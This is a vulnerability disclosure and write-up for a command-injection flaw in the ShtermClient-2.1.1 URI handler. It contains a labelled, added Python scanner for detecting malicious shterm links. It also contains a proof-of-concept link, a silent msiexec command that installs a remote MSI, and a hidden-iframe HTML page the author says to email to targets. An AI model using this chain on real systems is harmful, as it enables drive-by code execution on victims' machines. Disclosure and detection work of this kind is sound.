Qizhi Bastion Host ShtermClient-2.1.1 Command Execution Vulnerability (CNVD-2019-09593)

I. Basic information

Reference: https://www.cnvd.org.cn/flaw/show/1559039

Patch information: a patch fixing the vulnerability was released on April 1, 2019. Customers who have not yet applied the patch can contact Qizhi technical support for specific help.

II. Vulnerability discovery process

This was my first contact with an operations-and-maintenance bastion host: logging on to the target server or application through the bastion host works just as if you had opened it locally, which I found quite magical.

1. Discovery process

After the Qizhi bastion host client software ShtermClient is installed, it registers a pseudo-protocol "shterm" on the computer. The bastion host uses this protocol to invoke the local program and open a channel to the bastion host. The figure below shows the prompt Chrome displays when such a link is opened.

The handler can be found in the registry: the Command subkey specifies how a shterm URI is processed.

By capturing and analysing the traffic, we found that changing "app": "mstsc" to "app": "calc" in the generated shterm URI opens the local calculator. At first I thought the command injection was limited to the app parameter; then, using Procmon.exe to monitor LoadShell.exe, I found that it writes several log files in the %tmp% directory. After analysing those log files and running multiple tests, a working exploitation scheme was finally found.

From the source of Client/inflate.php it is clear that the server side only compresses the submitted data and then outputs it base64-encoded.

2. Verifying the vulnerability

If you are using a vulnerable ShtermClient, opening the following link in your browser launches the calculator calc.exe on the local machine.

shterm://eJyrVkosKFCyUkpOzElWqgUAIf8Ejw==
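The two sections above describe the URI format (data compressed, then base64-encoded) and give a proof-of-concept link. The following is an added example, not code from the original post or from the vendor: a small decoder that defenders can run over links found in mail bodies, HTML pages or proxy logs to inflate the payload and flag anything that does not look like a normal session request. It assumes the compression is zlib (the `eJy` prefix of the proof-of-concept is the standard zlib header), that the inflated payload is a JSON object with an `app` field (the field name appears in the write-up), and that `mstsc` is the only launcher a legitimate session should start; the `EXPECTED_APPS` allow-list and the command-line heuristic regex are assumptions for the example, not part of the write-up.

```python
import base64
import binascii
import json
import re
import zlib

SCHEME = "shterm://"

# Launchers a legitimate ShtermClient session is expected to start. The write-up
# only shows "mstsc"; this allow-list is an assumption for the example and should
# be extended with whatever launchers a real deployment actually uses.
EXPECTED_APPS = {"mstsc"}

# Heuristic (an assumption, not from the write-up): string values that look like a
# command line rather than a session parameter, e.g. "msiexec.exe /q /i https://...".
SUSPICIOUS_VALUE = re.compile(r"\.exe\b|\bmsiexec\b|https?://|\s/[a-z]", re.IGNORECASE)

# Matches shterm URIs embedded in HTML attributes, mail bodies or proxy logs.
URI_PATTERN = re.compile(r"shterm://[A-Za-z0-9+/]+=*")


def decode_shterm_uri(uri):
    """Strip the scheme, base64-decode, zlib-inflate and JSON-parse the payload.

    Raises ValueError for anything that is not a well-formed shterm URI.
    """
    if not uri.lower().startswith(SCHEME):
        raise ValueError("not a shterm URI")
    try:
        raw = base64.b64decode(uri[len(SCHEME):], validate=True)
        inflated = zlib.decompress(raw)  # zlib.decompress also verifies the Adler-32 trailer
        payload = json.loads(inflated.decode("utf-8"))
    except (binascii.Error, zlib.error, UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError(f"undecodable payload: {exc}") from exc
    if not isinstance(payload, dict):
        raise ValueError("payload is not a JSON object")
    return payload


def assess_shterm_uri(uri):
    """Return a dict with verdict 'ok', 'suspicious' or 'malformed' and the reasons."""
    try:
        payload = decode_shterm_uri(uri)
    except ValueError as exc:
        return {"verdict": "malformed", "app": None, "reasons": [str(exc)]}
    reasons = []
    app = payload.get("app")
    if app not in EXPECTED_APPS:
        reasons.append(f"unexpected app value {app!r}")
    # Check every string field, not only "app": the write-up notes that injection
    # was not limited to that parameter.
    for key, value in payload.items():
        if isinstance(value, str) and SUSPICIOUS_VALUE.search(value):
            reasons.append(f"command-like value in field {key!r}: {value!r}")
    return {"verdict": "suspicious" if reasons else "ok", "app": app, "reasons": reasons}


def scan_text(text):
    """Find every shterm URI in a blob of text and assess each one."""
    return [(m.group(0), assess_shterm_uri(m.group(0))) for m in URI_PATTERN.finditer(text)]


# Proof-of-concept URI from the write-up; it inflates to {"app":"calc"}.
POC_URI = "shterm://eJyrVkosKFCyUkpOzElWqgUAIf8Ejw=="

# Benign sample constructed here, using the same compress-then-base64 transform
# the write-up attributes to inflate.php.
BENIGN_URI = SCHEME + base64.b64encode(
    zlib.compress(json.dumps({"app": "mstsc"}).encode("utf-8"))).decode("ascii")

# Constructed HTML snippet mimicking the hidden-iframe delivery the write-up describes.
SAMPLE_HTML = (f'<iframe width="1" height="1" src="{POC_URI}"></iframe>'
               f'<a href="{BENIGN_URI}">rdp session</a>')

if __name__ == "__main__":
    for uri, result in scan_text(SAMPLE_HTML):
        print(result["verdict"], uri, result["reasons"])
```

Running the script prints `suspicious` for the proof-of-concept link (unexpected app value `'calc'`) and `ok` for the constructed `mstsc` link. The Adler-32 check performed by `zlib.decompress` means a truncated or tampered URI is reported as `malformed` rather than silently producing garbage; in a mail gateway or proxy, both `suspicious` and `malformed` verdicts are worth quarantining for review.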

III. Exploitation

1. Setting up a test environment

Install ShtermClient-2.1.1 on the target machine.

Then set up a PHP environment on Kali so that shterm URIs can be generated, as shown below.

Open the link in the target machine's browser and the calculator pops up.

2. Exploit

Submitting the POST request shown below generates a shterm URI that executes the following command:

msiexec.exe /q /n /i https://github.com/Yasushi/putty/archive/master.msi

Then put the shterm URI into an iframe and send the address of that HTML page to the target user by email or any other route you can think of, and the hidden purpose is achieved.

<html>
<head>
<meta charset="utf-8" />
<title>demo</title></head>
<body>
<h1>demo</h1>
<h1>Qizhi Bastion Host ShtermClient-2.1.1 Command Execution Vulnerability (CNVD-2019-09593)</h1>
<br><h1>Hacked by StudyCat</h1>
<iframe width="1" height="1" src="shterm://eJx1T8tqwzAQ/BWz5yC0tuu4uvWWQyAuDTm2yI9i48c6kt0klP57VzK4aaFCh5nZ2dndTygvoKBRGCUJbKCsPdsmKRNtmViVPsZxHByOGaonSbv96fwsB0RMIva8a+9BKeIHgSl/FUb8XPvss0KGtlhhPo7LQDfODoxf6qkyfWboentbc8KtK7tt/khuniGa7KzLvhms06bftuA1+CeTK/e9TK03ckhb3XLSpqyJ2mVBFnsamokMKLkBdjlZslwVKxx/oO7WI7U/stBdweSj4gAIBQoXOZvufltM4esbMSFnCg=="></iframe>
</body>
</html>

 


Origin: www.cnblogs.com/StudyCat/p/11201725.html